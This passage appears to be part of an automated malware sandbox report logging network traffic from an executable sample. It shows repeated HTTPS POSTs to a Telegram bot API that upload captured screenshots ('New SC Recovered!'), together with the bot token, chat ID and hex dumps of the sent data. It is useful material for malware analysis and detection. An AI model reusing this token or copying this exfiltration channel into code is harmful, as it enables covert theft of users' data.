                                                2024-07-25 22:02:16 UTC16355OUTData Raw: eb 52 09 2e 13 d9 7f a9 a7 0b b0 89 80 79 35 42 79 4c b2 97 ed d0 57 99 92 61 e5 f5 8f 69 d1 23 cb e2 07 1a 78 75 07 bb 7f 91 1d 14 51 5f 60 7c 50 51 45 14 01 d8 dd dd 45 67 61 a5 5c ce db 63 8d 81 27 fe d8 bd 71 3a 86 ad 73 7b a9 fd b7 79 47 53 fb b0 0f dc 03 a6 2b a9 f1 1d bc f7 3e 19 b1 4b 78 64 95 c3 46 4a a2 96 38 d8 79 e2 b9 2f ec ad 4b fe 81 f7 5f f7 e5 bf c2 bc ec 1c 60 a1 cc f7 d8 f7 b1 92 9b 9f 2a db 73 a4 93 c5 13 98 ac 6f 10 0f 29 58 a5 cc 40 73 bb fc 08 c9 1f 43 5a f1 cd 1d c5 8e af 34 4c 1a 37 25 94 8e e3 c9 4a e1 d7 4e d5 11 59 45 85 d6 d7 18 23 c9 6e 7f 4a ea 3c 3f 6f 3d b7 85 ef d2 e2 19 22 62 64 21 5d 4a 9c 6c 1c f3 59 e2 69 53 84 2f 13 4c 35 5a 93 9d a4 73 94 52 d2 57 aa 7c e8 51 45 14 0c 2b a8 f0 7f fa ab af f7 97 fa d7 2f 5d 47 83 ff
                                                Data Ascii: R.y5ByLWai#xuQ_`|PQEEga\c'q:s{yGS+>KxdFJ8y/K_`*so)X@sCZ4L7%JNYE#nJ<?o="bd!]JlYiS/L5ZsRW|QE+/]G
                                                2024-07-25 22:02:16 UTC16355OUTData Raw: 00 a6 9f a5 1f 65 1f f3 d3 f4 ab 14 b8 a2 e0 56 fb 2f fd 34 fd 28 fb 27 fb 7f a5 58 a2 9d c0 ad f6 41 fd ff 00 d2 8f b2 0f f9 e9 fa 55 9a 28 bb 02 b7 d9 07 fc f4 fd 28 fb 20 ff 00 9e 9f a5 59 a2 8b b1 95 7e c9 ff 00 4d 3f 4a 3e c9 ff 00 4d 3f 4a b5 8a 28 bb 02 af d8 ff 00 e9 a0 fc a8 fb 1f fd 34 fd 2a d5 18 a2 ec 2e 53 7b 4d a8 cc 1f 3b 46 7a 54 70 c5 e6 b1 5d d8 e3 35 7d ff 00 d4 cb fe e1 aa b6 7f eb 4f d2 84 d8 5c 5f b1 ff 00 d3 4f d2 8f b1 8f f9 e9 fa 55 aa 28 bb 0b 95 3e c4 3f e7 a7 e9 47 d8 87 fc f4 fd 2a dd 14 5d 8e e5 4f b1 0f f9 eb fa 51 f6 21 ff 00 3d 3f 4a b7 45 17 61 72 a7 d8 47 fc f4 fd 28 fb 10 ff 00 9e bf a5 5b a2 9d d8 5c a9 f6 11 ff 00 3d 7f 4a 5f b0 8f f9 eb fa 55 aa 29 5d 85 ca bf 61 1f f3 d7 3f 85 27 d8 46 7f d6 fe 95 6e 8a 2e c2 e5 4f
                                                Data Ascii: eV/4('XAU(( Y~M?J>M?J(4*.S{M;FzTp]5}O\_OU(>?G*]OQ!=?JEarG([\=J_U)]a?'Fn.O
                                                2024-07-25 22:02:16 UTC11321OUTData Raw: 94 b4 94 0c 28 a2 8a 00 4a 28 a2 81 85 25 14 50 01 49 4b 49 40 c2 92 96 92 80 0a 28 a4 a6 30 a2 8a 28 01 28 a2 8a 06 14 94 51 40 05 25 2d 25 03 0c d2 51 de 8a 06 14 51 45 00 25 14 51 40 c4 a2 8a 28 00 a4 a5 a4 a0 61 49 4b 49 40 c2 92 96 92 80 0a 28 a2 81 89 45 14 50 02 1a 28 a4 a0 61 45 2d 25 03 0a 4a 5a 4a 00 29 29 69 28 18 52 52 d2 50 01 45 14 50 31 28 a2 8a 06 14 94 51 40 05 25 2d 25 03 0a 28 a2 80 0a 4a 28 fc 68 18 73 49 4b 49 40 c3 f1 a3 f0 a3 f1 a2 80 12 8a 28 a0 61 49 4b eb 49 40 0b 49 ef 4b f9 d2 50 01 49 45 14 0c ea a8 a2 8a 93 c1 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 90 05 14 51 4c 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 5a 06 14 94 51 da 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a4 a0 05 a4 a2
                                                Data Ascii: (J(%PIKI@(0((Q@%-%QQE%Q@(aIKI@(EP(aE-%JZJ))i(RRPEP1(Q@%-%(J(hsIKI@(aIKI@IKPIE((((QL((((((ZQ((((
                                                2024-07-25 22:02:16 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 32 34 34 63 32 62 63 31 61 32 34 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dcf244c2bc1a24--
                                                2024-07-25 22:02:16 UTC405INHTTP/1.1 401 Unauthorized
                                                Server: nginx/1.18.0
                                                Date: Thu, 25 Jul 2024 22:02:16 GMT
                                                Content-Type: application/json
                                                Content-Length: 58
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                18192.168.2.649746149.154.167.2204435020C:\Users\user\Desktop\LisectAVT_2403002A_127.exe
                                                TimestampBytes transferredDirectionData
                                                2024-07-25 22:02:21 UTC262OUTPOST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcf5eb5d0922e3
                                                Host: api.telegram.org
                                                Content-Length: 57558
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-07-25 22:02:21 UTC25INHTTP/1.1 100 Continue
                                                2024-07-25 22:02:21 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 35 65 62 35 64 30 39 32 32 65 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 35 65 62 35 64 30 39 32 32 65 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 30 2f 32 36 2f 32 30 32 34 20 31 38 3a 31 33 3a 35 38 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcf5eb5d0922e3Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dcf5eb5d0922e3Content-Disposition: form-data; name="caption"New SC Recovered!Time: 10/26/2024 18:13:58User
                                                2024-07-25 22:02:21 UTC16355OUTData Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c
                                                Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
                                                2024-07-25 22:02:21 UTC16355OUTData Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b
                                                Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
                                                2024-07-25 22:02:21 UTC16355OUTData Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14
                                                Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
                                                2024-07-25 22:02:21 UTC7419OUTData Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28
                                                Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
                                                2024-07-25 22:02:21 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 35 65 62 35 64 30 39 32 32 65 33 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dcf5eb5d0922e3--
                                                2024-07-25 22:02:21 UTC405INHTTP/1.1 401 Unauthorized
                                                Server: nginx/1.18.0
                                                Date: Thu, 25 Jul 2024 22:02:21 GMT
                                                Content-Type: application/json
                                                Content-Length: 58
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                19192.168.2.649747149.154.167.2204435020C:\Users\user\Desktop\LisectAVT_2403002A_127.exe
                                                TimestampBytes transferredDirectionData
                                                2024-07-25 22:02:30 UTC262OUTPOST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcfac024112999
                                                Host: api.telegram.org
                                                Content-Length: 57558
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-07-25 22:02:30 UTC25INHTTP/1.1 100 Continue
                                                2024-07-25 22:02:30 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 61 63 30 32 34 31 31 32 39 39 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 61 63 30 32 34 31 31 32 39 39 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 31 2f 30 31 2f 32 30 32 34 20 32 31 3a 35 37 3a 31 30 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcfac024112999Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dcfac024112999Content-Disposition: form-data; name="caption"New SC Recovered!Time: 11/01/2024 21:57:10User
                                                2024-07-25 22:02:30 UTC16355OUTData Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c
                                                Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
                                                2024-07-25 22:02:30 UTC16355OUTData Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b
                                                Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
                                                2024-07-25 22:02:30 UTC16355OUTData Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14
                                                Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
                                                2024-07-25 22:02:30 UTC7419OUTData Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28
                                                Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
                                                2024-07-25 22:02:30 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 61 63 30 32 34 31 31 32 39 39 39 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dcfac024112999--
                                                2024-07-25 22:02:30 UTC405INHTTP/1.1 401 Unauthorized
                                                Server: nginx/1.18.0
                                                Date: Thu, 25 Jul 2024 22:02:30 GMT
                                                Content-Type: application/json
                                                Content-Length: 58
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                20192.168.2.649748149.154.167.2204435020C:\Users\user\Desktop\LisectAVT_2403002A_127.exe
                                                TimestampBytes transferredDirectionData
                                                2024-07-25 22:02:41 UTC262OUTPOST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dd0041be87c706
                                                Host: api.telegram.org
                                                Content-Length: 57558
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-07-25 22:02:41 UTC25INHTTP/1.1 100 Continue
                                                2024-07-25 22:02:41 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 30 34 31 62 65 38 37 63 37 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 30 34 31 62 65 38 37 63 37 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 31 2f 30 38 2f 32 30 32 34 20 32 31 3a 35 37 3a 33 30 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dd0041be87c706Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dd0041be87c706Content-Disposition: form-data; name="caption"New SC Recovered!Time: 11/08/2024 21:57:30User
                                                2024-07-25 22:02:41 UTC16355OUTData Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c
                                                Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
                                                2024-07-25 22:02:41 UTC16355OUTData Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b
                                                Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
                                                2024-07-25 22:02:41 UTC16355OUTData Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14
